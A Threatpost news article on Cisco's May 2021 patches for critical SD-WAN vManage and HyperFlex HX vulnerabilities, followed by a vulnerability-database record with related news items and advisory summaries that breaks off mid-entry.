Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.
The networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.
Separately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.
## **Critical vManage Security Bugs**
vManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco’s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:
* CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)
* CVE-2021-1505: Critical Privilege-Escalation Vulnerability
* CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability
* CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability
* CVE-2021-1275: High-Severity Denial-of-Service Vulnerability
The issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.
[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)
Join Threatpost for “[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)” a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.
Unauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.
Meanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.
Similarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.
Both local bugs exist “because the affected software does not perform authorization checks on certain operations,” according to Cisco.
A third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn’t perform authorization checks on service access.
And in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.
And finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.
“The vulnerability is due to insufficient handling of API requests to the affected system,” according to Cisco.
## **Cisco HyperFlex HX Command-Injection Bugs**
The HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers – across both traditional and cloud-native/containerized applications.
Cisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform’s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.
Cisco has patched two security bugs in HyperFlex HX in total:
* CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability
* CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability
The first is a critical flaw with a 9.8 CVSS rating,
“This vulnerability is due to insufficient validation of user-supplied input,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.”
The second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.”
Both flaws can be exploited by sending a crafted request to the web-based management interface.
These are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.
**Join Threatpost for “**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**” – a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **
{"id": "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "type": "threatpost", "bulletinFamily": "info", "title": "Critical Cisco SD-WAN, HyperFlex Bugs Menace Networks", "description": "Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.\n\nThe networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.\n\nSeparately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.\n\n## **Critical vManage Security Bugs**\n\nvManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:\n\n * CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)\n * CVE-2021-1505: Critical Privilege-Escalation Vulnerability\n * CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability\n * CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability\n * CVE-2021-1275: High-Severity Denial-of-Service Vulnerability\n\nThe issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nUnauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.\n\nMeanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.\n\nSimilarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.\n\nBoth local bugs exist \u201cbecause the affected software does not perform authorization checks on certain operations,\u201d according to Cisco.\n\nA third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn\u2019t perform authorization checks on service access.\n\nAnd in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.\n\nAnd finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.\n\n\u201cThe vulnerability is due to insufficient handling of API requests to the affected system,\u201d according to Cisco.\n\n## **Cisco HyperFlex HX Command-Injection Bugs**\n\nThe HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers \u2013 across both traditional and cloud-native/containerized applications.\n\nCisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform\u2019s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.\n\nCisco has patched two security bugs in HyperFlex HX in total:\n\n * CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability\n * CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability\n\nThe first is a critical flaw with a 9.8 CVSS rating,\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.\u201d\n\nThe second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.\u201d\n\nBoth flaws can be exploited by sending a crafted request to the web-based management interface.\n\nThese are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "published": "2021-05-06T17:54:33", "modified": "2021-05-06T17:54:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/critical-cisco-sd-wan-hyperflex-bugs/165923/", "reporter": "Tara Seals", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "https://threatpost.com/cisco-critical-security-flaw/164255/", "https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar"], "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "immutableFields": [], "lastseen": "2021-05-07T18:46:24", "viewCount": 62, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416", "CPAI-2022-0284"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ"]}, {"type": "cve", "idList": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"]}, {"type": "nessus", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ"]}, {"type": "cve", "idList": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"]}, {"type": "nessus", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "exploitation": null, "vulnersScore": 0.8}, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659925232}, "_internal": {"score_hash": "9af347d4744f01e2c40d4c69f3fc9cab"}}
{"thn": [{"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-50vFnI5p98k/YJPgYtKAl9I/AAAAAAAACd8/1v7GG_-Ci1Ue9y2cRLkwDJeb39bmkPtYwCLcBGAsYHQ/s0/cisco.jpg>)\n\nNetworking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information.\n\nIn a series of advisories published on May 5, the company said there are no workarounds that remediate the issues.\n\nThe HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device.\n\n\"An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface,\" the company [said](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) in its alert. \"A successful exploit could allow the attacker to execute arbitrary commands\" either as a root or tomcat8 user.\n\nCisco also squashed [five glitches](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>) affecting SD-WAN vManage Software (CVE-2021-1275, CVE-2021-1468, CVE-2021-1505, CVE-2021-1506, and CVE-2021-1508) that could permit an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nNikita Abramov and Mikhail Klyuchnikov of Positive Technologies have been credited with reporting the HyperFlex HX flaws, whereas four of the SD-WAN vManage bugs were identified during internal security testing, with CVE-2021-1275 uncovered during the resolution of a Cisco Technical Assistance Center (TAC) support case.\n\nWhile there is no evidence of malicious use of the vulnerabilities in the wild, it's recommended that users upgrade to the latest version to mitigate the risk associated with the flaws.\n\n### VMware Fixes Critical vRealize Business for Cloud Bug\n\nIt's not just Cisco. VMware on Wednesday released patches to fix a [critical severity flaw](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>) in vRealize Business for Cloud 7.6 that enables unauthenticated attackers to execute malicious code on vulnerable servers remotely.\n\nThe remote code execution flaw (CVE-2021-21984, CVSS score: 9.8) stems from an unauthorized [VAMI endpoint](<https://docs.vmware.com/en/VMware-Adapter-for-SAP-Landscape-Management/2.0.1/Installation-and-Administration-Guide-for-VLA-Administrators/GUID-CEEB151C-8B44-47B3-8D16-CB97BB865B2F.html>), resulting in a scenario that could cause an adversary with network access to run unauthorized code on the appliance. Affected customers can rectify the issue by [installing](<https://kb.vmware.com/s/article/83475>) the security patch ISO file.\n\nVmware credited Egor Dimitrenko of Positive Technologies for reporting the vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T12:30:00", "type": "thn", "title": "Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508", "CVE-2021-21984"], "modified": "2021-05-07T01:50:39", "id": "THN:E5C91FC48CC9CB51116164A4422D17F8", "href": "https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-12-22T12:15:04", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\"]", "cvss3": {}, "published": "2021-05-05T16:00:00", "type": "cisco", "title": "Cisco SD-WAN vManage Software Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "modified": "2021-05-05T16:00:00", "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}, {"lastseen": "2022-12-22T12:10:25", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\"]", "cvss3": {}, "published": "2021-05-05T16:00:00", "type": "cisco", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-12-15T22:19:48", "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "nessus": [{"lastseen": "2023-01-11T14:48:29", "description": "According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 